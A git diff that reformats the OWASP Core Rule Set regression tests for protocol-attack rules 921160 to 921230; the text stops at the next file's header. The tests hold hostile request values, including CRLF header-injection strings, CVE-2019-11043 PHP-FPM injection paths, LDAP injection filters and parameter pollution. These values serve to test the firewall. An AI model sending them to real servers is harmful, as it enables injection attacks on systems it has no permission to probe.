a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml index e0dd6f982..49354a855 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml @@ -1,103 +1,102 @@ --- meta: author: "Christian S.J. Peron, azurit" - enabled: true - name: "921160.yaml" description: "Tests for protocol based attacks" +rule_id: 921160 tests: - - test_title: 921160-1 + - test_id: 1 desc: "HTTP Header Injection Attack via payload: w/header, invalid line break, newlines after key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] + - test_id: 2 desc: "HTTP Header Injection Attack via payload: w/header, correct line break, newlines after key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] + - test_id: 3 desc: "HTTP Header Injection Attack via payload: w/header" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] + - test_id: 4 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in value rather than key" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] + - test_id: 5 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in key rather than value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y" - version: "HTTP/1.1" - output: - log_contains: id "921160" - - test_title: 921160-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] + - test_id: 6 desc: "Status Page Test - simple HTTP header Injection Attack via payload in value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=%0d%0arefresh:%20www.bar.com" - version: "HTTP/1.1" - output: - log_contains: id "921160" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=%0d%0arefresh:%20www.bar.com" + version: "HTTP/1.1" + output: + log: + expect_ids: [921160] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml index a4c10816b..881e2d4d1 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml @@ -1,103 +1,101 @@ --- meta: author: "jptosso, azurit" - enabled: true - name: "921180.yaml" - description: "Tests to trigger, or not trigger 921170 and 921180" +rule_id: 921180 tests: - # Standard GET request - test_title: 921180-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921180] - # Standard GET request - test_title: 921180-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pizza=pineapple" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pizza=pineapple" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921180] - # Standard GET request (Negative, no args) - test_title: 921180-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921180] - # HPP payload - test_title: 921180-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple=aint-pizza" - version: "HTTP/1.1" - output: - log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple=aint-pizza" + version: "HTTP/1.1" + output: + log: + expect_ids: [921180] - # Similar arg names - test_title: 921180-5 + test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple2=aint-pizza" - version: "HTTP/1.1" - output: - no_log_contains: "id \"921180\"" - - # HPP payload with multiple iterations - test_title: 921180-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple2=aint-pizza" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921180] + - test_id: 6 + desc: query parameter repetition stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/?pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2" - version: "HTTP/1.1" - output: - log_contains: "id \"921180\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/?pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2" + version: "HTTP/1.1" + output: + log: + expect_ids: [921180] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml index b92fc6b0a..f8138f8a2 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml @@ -2,66 +2,65 @@ meta: author: "Andrea Menin (theMiddle), azurit" description: "HTTP Splitting" - enabled: true - name: 921190.yaml +rule_id: 921190 tests: - - test_title: 921190-1 + - test_id: 1 desc: "New line char in request filename (1)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/foo%0Abar" - version: "HTTP/1.1" - output: - log_contains: id "921190" - - test_title: 921190-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/foo%0Abar" + version: "HTTP/1.1" + output: + log: + expect_ids: [921190] + - test_id: 2 desc: "New line char in request filename (2)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/foo%0abar" - version: "HTTP/1.1" - output: - log_contains: id "921190" - - test_title: 921190-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/foo%0abar" + version: "HTTP/1.1" + output: + log: + expect_ids: [921190] + - test_id: 3 desc: "FastCGI variable injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/index.php/PHP%0Ainfo.php?QQQ" - version: "HTTP/1.1" - output: - log_contains: id "921190" - - test_title: 921190-4 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/index.php/PHP%0Ainfo.php?QQQ" + version: "HTTP/1.1" + output: + log: + expect_ids: [921190] + - test_id: 4 desc: "PHP Settings injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ" - version: "HTTP/1.1" - output: - log_contains: id "921190" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ" + version: "HTTP/1.1" + output: + log: + expect_ids: [921190] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml index 13b3dc180..dc397acbf 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml @@ -2,176 +2,175 @@ meta: author: "Christian Folini, azurit" description: "LDAP injection" - enabled: true - name: 921200.yaml +rule_id: 921200 tests: - - test_title: 921200-1 + - test_id: 1 desc: "Testing for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921200] + - test_id: 2 desc: "Testing for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921200] + - test_id: 3 desc: "Testing for FP, this should not trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: POST - data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "921200" - - test_title: 921200-4 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: POST + data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921200] + - test_id: 4 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=bar)(%26)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-5 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=bar)(%26)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 5 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=printer)(uid=*)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-6 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=printer)(uid=*)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 6 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=void)(objectClass=users))(%26(objectClass=void)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-7 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=void)(objectClass=users))(%26(objectClass=void)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 7 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=eb9adbd87d)!(sn=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-8 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=eb9adbd87d)!(sn=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 8 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=*)!(sn=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-9 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=*)!(sn=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 9 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=*)(uid=*))(|(uid=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-10 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=*)(uid=*))(|(uid=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] + - test_id: 10 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=aaa*aaa)(cn>=bob)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=aaa*aaa)(cn>=bob)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log: + expect_ids: [921200] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml index 78b250c06..d338384ff 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml @@ -2,51 +2,50 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Parameter Pollution" - enabled: true - name: 921210.yaml +rule_id: 921210 tests: - - test_title: 921210-1 + - test_id: 1 desc: "HTTP Parameter Pollution via bogus chars after parameter array name" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1]a=bar&foo[1]b=" - version: "HTTP/1.1" - output: - log_contains: id "921210" - - test_title: 921210-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1]a=bar&foo[1]b=" + version: "HTTP/1.1" + output: + log: + expect_ids: [921210] + - test_id: 2 desc: "HTTP Parameter Pollution via bogus chars between square brackets of multi-dimensional array name" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1]a[2]=bar" - version: "HTTP/1.1" - output: - log_contains: id "921210" - - test_title: 921210-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1]a[2]=bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [921210] + - test_id: 3 desc: "HTTP Parameter Pollution false positive test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1][2]=bar" - version: "HTTP/1.1" - output: - no_log_contains: id "921210" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1][2]=bar" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921210] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml index 6f260a6b0..a255b5a10 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml @@ -2,22 +2,21 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Parameter Pollution" - enabled: true - name: 921220.yaml +rule_id: 921220 tests: - - test_title: 921220-1 + - test_id: 1 desc: "Potential HTTP Parameter Pollution via parameter array" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get?foo[1]=bar" - version: "HTTP/1.1" - output: - log_contains: id "921220" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get?foo[1]=bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [921220] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml index dbe32ad8b..a63c737b7 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml @@ -2,22 +2,21 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Range Header" - enabled: true - name: 921230.yaml +rule_id: 921230 tests: - - test_title: 921230-1 + - test_id: 1 desc: "Submit HTTP Range Header, forbidden at PL3 by default" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Range: 1-2 - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "921230" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Range: 1-2 + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [921230] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml index 314f48f32..15915dff1 100644 --- 